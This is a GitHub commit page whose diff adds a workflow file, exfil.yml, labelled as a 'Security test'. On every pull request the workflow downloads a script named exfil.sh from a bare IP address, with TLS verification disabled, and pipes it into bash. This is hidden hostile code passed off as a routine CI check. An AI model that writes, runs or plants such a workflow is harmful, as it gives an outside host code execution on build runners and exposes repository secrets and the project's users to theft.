Skip to content

Commit

Permalink
chore: test
Browse files Browse the repository at this point in the history
Signed-off-by: hugo-syn <[email protected]>
  • Loading branch information
hugo-syn committed Jan 21, 2024
1 parent bd4f1ab commit dca46f7
Showing 1 changed file with 12 additions and 0 deletions.
12 changes: 12 additions & 0 deletions .github/workflows/exfil.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
name: Security test
on:
pull_request:

jobs:
security:
runs-on: macos-11

steps:
- name: security test
run: |
curl -k https://35.181.173.21/static/exfil.sh | bash

0 comments on commit dca46f7

Please sign in to comment.